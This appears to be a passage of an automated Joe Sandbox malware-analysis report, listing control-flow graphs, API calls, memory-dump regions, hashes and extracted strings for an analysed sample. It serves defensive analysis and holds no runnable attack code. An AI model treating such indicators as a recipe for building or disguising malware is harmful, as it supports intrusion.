                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 45a29fb2e8d3c8315856dd7d8699b4d6eff20897f955594d78bada26a8f50215
                                                                                                                        • Instruction ID: 17feff451b92fda4137b92d5a1a02cf3b42a7b09de93dc99acea9f15fc0f80d5
                                                                                                                        • Opcode Fuzzy Hash: 45a29fb2e8d3c8315856dd7d8699b4d6eff20897f955594d78bada26a8f50215
                                                                                                                        • Instruction Fuzzy Hash: F741F4B4E01248CFEB58CFAAD5446ADFBF2AF98304F20D429D459AB359DB344A46CF44

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 679 40cbf7-40cc06 680 40cc08-40cc14 679->680 681 40cc2f 679->681 680->681 682 40cc16-40cc1d 680->682 683 40cc33-40cc3d call 40d534 681->683 682->681 684 40cc1f-40cc2d 682->684 687 40cc47 683->687 688 40cc3f-40cc46 call 40cbb4 683->688 684->683 690 40cc47 call 41087e 687->690 688->687 692 40cc4c-40cc4e 690->692 693 40cc50-40cc57 call 40cbb4 692->693 694 40cc58-40cc68 call 4129c9 call 411a15 692->694 693->694 701 40cc72-40cc82 GetCommandLineA call 412892 694->701 702 40cc6a-40cc71 call 40e79a 694->702 707 40cc87 call 4127d7 701->707 702->701 708 40cc8c-40cc8e 707->708 709 40cc90-40cc97 call 40e79a 708->709 710 40cc98-40cc9f call 41255f 708->710 709->710 715 40cca1-40cca8 call 40e79a 710->715 716 40cca9-40ccb3 call 40e859 710->716 715->716 721 40ccb5-40ccbb call 40e79a 716->721 722 40ccbc-40ccd3 call 4019f0 716->722 721->722 726 40ccd8-40cce2 722->726 727 40cce4-40cce5 call 40ea0a 726->727 728 40ccea-40cd2e call 40ea36 call 40e21d 726->728 727->728
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2598563909-0
                                                                                                                        • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                        • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                                                        • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                        • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 735 2197c08-2197c3d 736 219806c-2198070 735->736 737 2197c43-2197c66 735->737 738 2198089-2198097 736->738 739 2198072-2198086 736->739 746 2197c6c-2197c79 737->746 747 2197d14-2197d18 737->747 744 2198099-21980ae 738->744 745 2198108-219811d 738->745 753 21980b0-21980b3 744->753 754 21980b5-21980c2 744->754 755 219811f-2198122 745->755 756 2198124-2198131 745->756 760 2197c88 746->760 761 2197c7b-2197c86 746->761 750 2197d1a-2197d28 747->750 751 2197d60-2197d69 747->751 750->751 765 2197d2a-2197d45 750->765 757 219817f 751->757 758 2197d6f-2197d79 751->758 762 21980c4-2198105 753->762 754->762 763 2198133-219816e 755->763 756->763 767 2198184-21981b4 757->767 758->736 764 2197d7f-2197d88 758->764 766 2197c8a-2197c8c 760->766 761->766 811 2198175-219817c 763->811 770 2197d8a-2197d8f 764->770 771 2197d97-2197da3 764->771 791 2197d53 765->791 792 2197d47-2197d51 765->792 766->747 774 2197c92-2197cf4 766->774 798 21981cd-21981d4 767->798 799 21981b6-21981cc 767->799 770->771 771->767 772 2197da9-2197daf 771->772 778 2197db5-2197dc5 772->778 779 2198056-219805a 772->779 824 2197cfa-2197d11 774->824 825 2197cf6 774->825 793 2197dd9-2197ddb 778->793 794 2197dc7-2197dd7 778->794 779->757 783 2198060-2198066 779->783 783->736 783->764 796 2197d55-2197d57 791->796 792->796 797 2197dde-2197de4 793->797 794->797 796->751 805 2197d59 796->805 797->779 806 2197dea-2197df9 797->806 805->751 807 2197dff 806->807 808 2197ea7-2197ed2 call 2197a50 * 2 806->808 813 2197e02-2197e13 807->813 826 2197ed8-2197edc 808->826 827 2197fbc-2197fd6 808->827 813->767 815 2197e19-2197e2b 813->815 815->767 818 2197e31-2197e49 815->818 880 2197e4b call 21985f0 818->880 881 2197e4b call 21985e0 818->881 820 2197e51-2197e61 820->779 823 2197e67-2197e6a 820->823 828 2197e6c-2197e72 823->828 829 2197e74-2197e77 823->829 824->747 825->824 826->779 830 2197ee2-2197ee6 826->830 827->736 847 2197fdc-2197fe0 827->847 828->829 831 2197e7d-2197e80 828->831 829->757 829->831 833 2197ee8-2197ef5 830->833 834 2197f0e-2197f14 830->834 836 2197e88-2197e8b 831->836 837 2197e82-2197e86 831->837 848 2197f04 833->848 849 2197ef7-2197f02 833->849 839 2197f4f-2197f55 834->839 840 2197f16-2197f1a 834->840 836->757 838 2197e91-2197e95 836->838 837->836 837->838 838->757 845 2197e9b-2197ea1 838->845 843 2197f61-2197f67 839->843 844 2197f57-2197f5b 839->844 840->839 846 2197f1c-2197f25 840->846 850 2197f69-2197f6d 843->850 851 2197f73-2197f75 843->851 844->811 844->843 845->808 845->813 852 2197f34-2197f4a 846->852 853 2197f27-2197f2c 846->853 854 219801c-2198020 847->854 855 2197fe2-2197fec call 21968f0 847->855 858 2197f06-2197f08 848->858 849->858 850->779 850->851 856 2197faa-2197fac 851->856 857 2197f77-2197f80 851->857 852->779 853->852 854->811 860 2198026-219802a 854->860 855->854 868 2197fee-2198003 855->868 856->779 865 2197fb2-2197fb9 856->865 862 2197f8f-2197fa5 857->862 863 2197f82-2197f87 857->863 858->779 858->834 860->811 866 2198030-219803d 860->866 862->779 863->862 871 219804c 866->871 872 219803f-219804a 866->872 868->854 877 2198005-219801a 868->877 874 219804e-2198050 871->874 872->874 874->779 874->811 877->736 877->854 880->820 881->820
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                        • API String ID: 0-1932283790
                                                                                                                        • Opcode ID: 84fe3fda8a2e31b9a79d5808bbcaeb22765f39c9675555466ca8f19a2bf737bb
                                                                                                                        • Instruction ID: 40efef69bbe1245c315957e4c54f4605e65de827bb69abeac85aab0e4d2d375e
                                                                                                                        • Opcode Fuzzy Hash: 84fe3fda8a2e31b9a79d5808bbcaeb22765f39c9675555466ca8f19a2bf737bb
                                                                                                                        • Instruction Fuzzy Hash: 38125A30A402089FCF14CF69D984AAEBBF2FF49314F1585A9E4599B3A1D731ED41CB50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 882 64ab840-64ab848 883 64ab84a-64ab8df GetCurrentProcess 882->883 884 64ab818-64ab823 882->884 890 64ab8e8-64ab91c GetCurrentThread 883->890 891 64ab8e1-64ab8e7 883->891 884->882 892 64ab91e-64ab924 890->892 893 64ab925-64ab959 GetCurrentProcess 890->893 891->890 892->893 895 64ab95b-64ab961 893->895 896 64ab962-64ab97a 893->896 895->896 908 64ab97d call 64aba20 896->908 909 64ab97d call 64abe00 896->909 899 64ab983-64ab9b2 GetCurrentThreadId 900 64ab9bb-64aba1d 899->900 901 64ab9b4-64ab9ba 899->901 901->900 908->899 909->899
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 064AB8CE
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 064AB90B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 064AB948
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 064AB9A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108338151.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_64a0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID: pRr
                                                                                                                        • API String ID: 2063062207-2637602436
                                                                                                                        • Opcode ID: cfcdf31cec231f23209e7104e992352a6efbace78b4690c90d57ef4618951b86
                                                                                                                        • Instruction ID: 9b2cb38f8c3f36af23270387431c63e484fa751bca154d8ffd134a1a34c2017a
                                                                                                                        • Opcode Fuzzy Hash: cfcdf31cec231f23209e7104e992352a6efbace78b4690c90d57ef4618951b86
                                                                                                                        • Instruction Fuzzy Hash: CF5178B09013499FDB44DFAAD948BEEBBF1EF48314F24805AE009AB3A1C7749944CF65

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 910 64ab850-64ab8df GetCurrentProcess 914 64ab8e8-64ab91c GetCurrentThread 910->914 915 64ab8e1-64ab8e7 910->915 916 64ab91e-64ab924 914->916 917 64ab925-64ab959 GetCurrentProcess 914->917 915->914 916->917 919 64ab95b-64ab961 917->919 920 64ab962-64ab97a 917->920 919->920 932 64ab97d call 64aba20 920->932 933 64ab97d call 64abe00 920->933 923 64ab983-64ab9b2 GetCurrentThreadId 924 64ab9bb-64aba1d 923->924 925 64ab9b4-64ab9ba 923->925 925->924 932->923 933->923
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 064AB8CE
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 064AB90B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 064AB948
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 064AB9A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108338151.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_64a0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID: pRr
                                                                                                                        • API String ID: 2063062207-2637602436
                                                                                                                        • Opcode ID: c17058c2517514795d29b2d8ae58c216425b54359e15eb19673eb803a96fd200
                                                                                                                        • Instruction ID: 3829e8ec89976987189ae8eccbbbfa625f83e5c30f34c1d5a6ee26b69b210c37
                                                                                                                        • Opcode Fuzzy Hash: c17058c2517514795d29b2d8ae58c216425b54359e15eb19673eb803a96fd200
                                                                                                                        • Instruction Fuzzy Hash: CC5155B09003099FDB44DFAAD948BDEBBF1EF88314F248059E049AB3A0DB749944CF65
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4103914064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.4103897598.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103935605.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.4103996215.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1411284514-0
                                                                                                                        • Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                        • Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
                                                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108188713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6410000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (bq$(bq$xbq$xbq
                                                                                                                        • API String ID: 0-2582918839
                                                                                                                        • Opcode ID: 696bc5a6a5b703cb4d7f34eb2fa956f06449758e1c7b44e061692d1d58b3fb61
                                                                                                                        • Instruction ID: 4d1f08001cdafa7dc9670408017d8abcaf22a709f692a855d8126bc03fe504c0
                                                                                                                        • Opcode Fuzzy Hash: 696bc5a6a5b703cb4d7f34eb2fa956f06449758e1c7b44e061692d1d58b3fb61
                                                                                                                        • Instruction Fuzzy Hash: F7619F307002049FDB459F68C450BAE7BE2EF89310F14846DE80A8F395CB36ED46CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (o^q$La$La
                                                                                                                        • API String ID: 0-4149982984
                                                                                                                        • Opcode ID: 07d00c4107e70a21b549c2d9a5adc3e7c2daa28b057c39d50c5695c4dc234cbd
                                                                                                                        • Instruction ID: 3a33c0834643c675c8c5d0cb4a1c11c86090d5665532504af7789423c04d54e6
                                                                                                                        • Opcode Fuzzy Hash: 07d00c4107e70a21b549c2d9a5adc3e7c2daa28b057c39d50c5695c4dc234cbd
                                                                                                                        • Instruction Fuzzy Hash: 2C11E7307812444FCF05AB7A96901A97FABEFC52287144479D145CB369EF35CC07CBA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $^q$$^q
                                                                                                                        • API String ID: 0-355816377
                                                                                                                        • Opcode ID: c3c9e6514713fd590dc2608bdd0a98542f7d7479cd7e026bca319d489b8d7d2e
                                                                                                                        • Instruction ID: 3d728d3f73110a4555ff6e11997493a4fc700cdbaaf6e3896d44ee3e2adf791a
                                                                                                                        • Opcode Fuzzy Hash: c3c9e6514713fd590dc2608bdd0a98542f7d7479cd7e026bca319d489b8d7d2e
                                                                                                                        • Instruction Fuzzy Hash: 27524474A00218CFEB659BA4C960BAEBB77EF84300F1081ADD10A6B795CF359E85DF51
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q
                                                                                                                        • API String ID: 0-2697143702
                                                                                                                        • Opcode ID: 6cf8c74e8bd4bc71ced12ec4b1fbd326946c8739e469f3af88bcff91f968a8c6
                                                                                                                        • Instruction ID: f60a8b7e6fbab842ddc5406befd7cee4265531169902a423d9e96b7a844d9d38
                                                                                                                        • Opcode Fuzzy Hash: 6cf8c74e8bd4bc71ced12ec4b1fbd326946c8739e469f3af88bcff91f968a8c6
                                                                                                                        • Instruction Fuzzy Hash: 82B17E307841018FDF299F69C4A873E3796AF85604F1944BEE566CF3A5DB26CC42CB82
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Hbq$Hbq
                                                                                                                        • API String ID: 0-4258043069
                                                                                                                        • Opcode ID: 58a9259b2ad5d9492c9fc5b012bbfcb0115656b92a621eea9553f272fc9e1335
                                                                                                                        • Instruction ID: cd8212a911be6f1bf094b9d727561e0754e988a59449bad212314812b379f1c1
                                                                                                                        • Opcode Fuzzy Hash: 58a9259b2ad5d9492c9fc5b012bbfcb0115656b92a621eea9553f272fc9e1335
                                                                                                                        • Instruction Fuzzy Hash: F8B1CD307842948FCB199F38C854B7A7BAAAFC9340F158869E906CB395CB35C851CBA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,bq$,bq
                                                                                                                        • API String ID: 0-2699258169
                                                                                                                        • Opcode ID: 13fe6ddcc729ccb4626f946a32b2ace9e5d320c0460b0fc28ba1f374937b17a7
                                                                                                                        • Instruction ID: ca75791eb1fb2e4f07f291f2613e2fb35b088af8cbe9df9250b886ba15bad329
                                                                                                                        • Opcode Fuzzy Hash: 13fe6ddcc729ccb4626f946a32b2ace9e5d320c0460b0fc28ba1f374937b17a7
                                                                                                                        • Instruction Fuzzy Hash: 8391E330B80149CFCF28DF68C894AA9BBBAFF89314B158169D416DB365E731D841CB71
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108169879.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_63b0000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (&^q$(bq
                                                                                                                        • API String ID: 0-1294341849
                                                                                                                        • Opcode ID: 2d0728434d4632cb6622460a34102b282f323654d05e9e0c5043cffd1fbf06ec
                                                                                                                        • Instruction ID: 9cd18de287c1c47d5ce8ac8b61bc76d666af832e8844839b4a5eeee49d29c808
                                                                                                                        • Opcode Fuzzy Hash: 2d0728434d4632cb6622460a34102b282f323654d05e9e0c5043cffd1fbf06ec
                                                                                                                        • Instruction Fuzzy Hash: F2718D31F002199FCB55DFB9C8506EEBBF6AF89700F148569E506A7380DE309E46CBA5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108188713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6410000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: E$LR^q
                                                                                                                        • API String ID: 0-1742118803
                                                                                                                        • Opcode ID: 38a5534b48ff9f16b6da055e241f18de92bb75982577e15e2c186bb74296489a
                                                                                                                        • Instruction ID: c1efa54bd84b7702bc0be1845a1ab24ba589ab8cd681670d7d10f3be5ebabadf
                                                                                                                        • Opcode Fuzzy Hash: 38a5534b48ff9f16b6da055e241f18de92bb75982577e15e2c186bb74296489a
                                                                                                                        • Instruction Fuzzy Hash: 3361CF71B005058FCB94DF79C884A6E7BF6EF89600B14856AE41ADF3A5EB30DC06CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LR^q
                                                                                                                        • API String ID: 0-2625958711
                                                                                                                        • Opcode ID: 658e85f99fd106244ca35ded11bc9f6bc0ea21d4bbedcd6448ab9790d84e8681
                                                                                                                        • Instruction ID: d58d447ae53cdbe77314e3825f31aee536e08b20ed91f47e588844f7dc7f80ca
                                                                                                                        • Opcode Fuzzy Hash: 658e85f99fd106244ca35ded11bc9f6bc0ea21d4bbedcd6448ab9790d84e8681
                                                                                                                        • Instruction Fuzzy Hash: E5520E74E40219CFCB94EF24E994A9DBBB2FB8D304F1085A5D509A7329DB346E95CF80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4104668370.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2190000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LR^q
                                                                                                                        • API String ID: 0-2625958711
                                                                                                                        • Opcode ID: 9190855e5332d7f776c04258a494b775fae99888b78365176d7439fb779540fa
                                                                                                                        • Instruction ID: a1c1bb0822134bafb9a2bb6c9505435a4833e08b085b82f3ce029aea13f1045e
                                                                                                                        • Opcode Fuzzy Hash: 9190855e5332d7f776c04258a494b775fae99888b78365176d7439fb779540fa
                                                                                                                        • Instruction Fuzzy Hash: 99520E74E40219CFCB94EF24E994A9DBBB2FB8D304F1085A5D509A7329DB346E95CF80
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 06F8462E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108594367.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6f80000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 155cb5236eef5694055aab7da297a479250faf7e50f51bbee85271880983b6fd
                                                                                                                        • Instruction ID: a3de4c94cc1808d0ad1a57d750cd9ba17d4b9c78d852a5e0ca5cf11883bcf8c1
                                                                                                                        • Opcode Fuzzy Hash: 155cb5236eef5694055aab7da297a479250faf7e50f51bbee85271880983b6fd
                                                                                                                        • Instruction Fuzzy Hash: B6815670A00B059FD7A4EF69D44579ABBF1FF88300F008A6DD48ADBA50DB74E949CB90
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F866C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.4108594367.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_6f80000_173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: cc29250876f28ea18277ba22e5ee3750e4adabe2d7a998b84ed4848a9dad37de
